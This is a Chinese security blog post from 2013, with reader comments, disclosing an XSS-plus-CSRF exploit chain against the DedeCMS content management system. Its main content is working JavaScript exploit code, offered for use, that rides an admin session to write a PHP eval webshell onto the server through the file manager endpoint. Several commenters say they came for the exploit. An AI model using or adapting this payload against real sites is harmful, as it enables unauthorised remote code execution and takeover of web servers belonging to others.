您的位置 » 首页 » 代码审计,实用工具 » 代码审计:dedecms(织梦)最新利用xss+csrf getshell 0day漏洞 附利用EXP

代码审计:dedecms(织梦)最新利用xss+csrf getshell 0day漏洞 附利用EXP

发表于4年前 | 作者: seay | 分类: 代码审计, 实用工具 | 孵化于:2013年06月04日 | 文章热度:9,393 次 全屏阅读

显示不全请点击全屏阅读

PS:这个漏洞在上次的 {代码审计:Dedecms 二次注入经典exp构造 原60字符限制突破利用} 文章已经说过了,最初由SafeKey Team的yy520在乌云提到过。

 

 

dedecms的漏洞很多,但是厂商都是不做修复。
之前乌云爆的一个二次注入的漏洞,其中title能够xss,但是官方只是修复了注入,xss并没有修复,只是在title上加了addslashes。
xss1

后台可触发xss
xss2

利用js代码

var request = false;
if(window.XMLHttpRequest) {
request = new XMLHttpRequest();
if(request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if(window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for(var i=0; i<versions.length; i++) {
try {
request = new ActiveXObject(versions[i]);
} catch(e) {}
}
}
xmlhttp=request;
 
getshell();
function getshell(){
 
var postStr="fmdo=edit&backurl=&activepath=%2Fdedecmsfullnew%2Fuploads%2Fuploads&filename=paxmac.php&str=%3C%3Fphp+eval%28%24_POST%5B%27cmd%27%5D%29%3B%3F%3E&B1=++%B1%A3+%B4%E6++";//url需要自己修改
 
xmlhttp.open("POST", "http://paxmac/dedecmsfullnew/uploads/dede/file_manage_control.php", true);//url需要自己修改
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", postStr.length);
xmlhttp.setRequestHeader("Connection", "close");
xmlhttp.send(postStr);
} xss3 

触发前 触发前

触发后 触发后

作者:花开、若相惜

Tags:

dedecms漏洞,

如果您喜欢我的博客,欢迎点击图片定订阅到邮箱填写您的邮件地址,订阅我们的精彩内容: 也可以点击链接【订阅到鲜果】

如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡


来自 Seay互联网安全博客
本文地址:http://www.cnseay.com/2939/
文章版权说明请看置顶文章,尊重作者,转载请以链接形式标明原文地址

马上分享给你的朋友吧~

已经有6个筒子的人留下了脚印...

  • xiao_hen 说:
    1楼
    2013 年 6 月 4 日 下午 1:38 回复

    很经典,学习了哦。 😈

  • Master 说:
    2楼
    2013 年 6 月 4 日 下午 2:32 回复

    这么牛b啊。

  • IcefoxHack 说:
    3楼
    2013 年 6 月 4 日 下午 6:41 回复

    麻痹的 说好的exp呢 我是奔着exp来的 你就让我看这个??? 😡

  • 风之传说 说:
    4楼
    2013 年 6 月 4 日 下午 10:28 回复

    表示刚才找了一个网站,从aid=1 到aid=500都不能评论。。

  • 爱点我 说:
    5楼
    2013 年 6 月 5 日 上午 9:21 回复

    只求exp,这漏洞我喜欢

  • 1 说:
    6楼
    2013 年 6 月 6 日 下午 5:25 回复

    后面的那个b1,同样是保存,但是我提交的时候就必须该为++%E4%BF%9D+%E5%AD%98++,是为什么呢?

发表评论

你的大名(必填)

你的邮箱(必填)

评论内容(必填)